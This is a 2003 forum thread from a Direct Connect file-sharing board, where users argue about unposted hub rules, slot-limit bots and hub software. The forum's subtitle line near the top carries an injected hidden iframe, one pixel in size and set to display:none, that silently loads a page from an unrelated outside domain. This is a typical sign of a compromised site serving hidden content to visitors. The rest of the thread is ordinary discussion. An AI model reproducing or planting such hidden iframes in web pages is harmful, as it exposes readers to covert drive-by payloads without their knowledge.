RANT - Undisclosed HUB policies

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Sapporo

RANT - Undisclosed HUB policies

Post by Sapporo » 2003-02-17 23:14

Today I got kicked from a hub for having too many slots for my "type" of connection. WTF? That wasn't mentioned in their HUB rules for crying out loud. Ok, so now I get kicked for being in too many hubs, not having enough slots, not sharing enough AND having too many slots. What's next? Getting kicked because my nick doesn't have enough letters in it?

Isn't filesharing supposed to be easy? I mean you almost have to bust out the calculator just to figure out if you comply to the posted HUB rules. Don't even think about trying to abided by the unposted rules that the hubs bots/ops kick or ban by.

HUB Operators please make sure all of your rules are posted and your bots/ops abide by them.

synapz

Re: RANT - Undisclosed HUB policies

Post by synapz » 2003-02-18 01:00

Sapporo wrote:Today I got kicked from a hub for having too many slots for my "type" of connection. WTF? That wasn't mentioned in their HUB rules for crying out loud. Ok, so now I get kicked for being in too many hubs, not having enough slots, not sharing enough AND having too many slots. What's next? Getting kicked because my nick doesn't have enough letters in it?

Isn't filesharing supposed to be easy? I mean you almost have to bust out the calculator just to figure out if you comply to the posted HUB rules. Don't even think about trying to abided by the unposted rules that the hubs bots/ops kick or ban by.

HUB Operators please make sure all of your rules are posted and your bots/ops abide by them.
It's LITTLEBIT hard to put every rule in the hub description, dont you think??? Expecially if the hub have different max slots for different connection types.

I have max 15 slots on my hub because I don't want that people with DC++ and say...ADSL to have 99 slots open because then the users would have like...1 byte/s downloading speed from that user.
On my hub I have 15 lots max for whatever connection but I guess that some hubs have different slots rules for different connections because it makes more sense having 15 slots open on a 10Mbit connection than on a modem connection.

This is normally taken care of by a script and there's no way to put every little rule on the public hublist so a user have to find out "the hard way".

Now you have two choices. Comply to those rules after you know what they are or just visit another hub...
Just another silly hub owner ;-)

Sapporo

Post by Sapporo » 2003-02-18 10:47

synapz wrote:It's LITTLEBIT hard to put every rule in the hub description, dont you think??? Expecially if the hub have different max slots for different connection types.
I agree, but I also think this is why I'm seeing more and more hubs using a helper bot where you can type "+rules" and get a list of all them.

Oh, lastnight I got kicked by the "Max-Slot" bot again ... The PM I got from it?

"You have 5 slots and for your connection 'Cable' you can have a max of 5 slots."

wtf? Three cheers for the 12 y/o scripter!

Splicer

Post by Splicer » 2003-02-21 04:36

I like the hubs that say they're 5gb shares on the list, when they changed to 50gb three weeks ago.
"Tomorrow sees undone, what happens not today. Indecision brings delays. Days lost lamenting lost days"

"I’m getting some kind of sick pleasure out of watching her squirm!?!........must be a perk!"

synapz

Post by synapz » 2003-02-21 06:44

Ok, I only talk from the experience of running 5 hubs on our little network. Everyone of them has a +rules command BUT if a users can't get in because he get kicked by a bot, he probably can't see the rules page either. It depends of course how the script is made working. Then we have all the faulty scripts out there...Also I see that more and more hubs are running the PtokaX hub software and from the experience of running a PtokaX test hub for a month or so I can't really trust the software as it is now...
Just another silly hub owner ;-)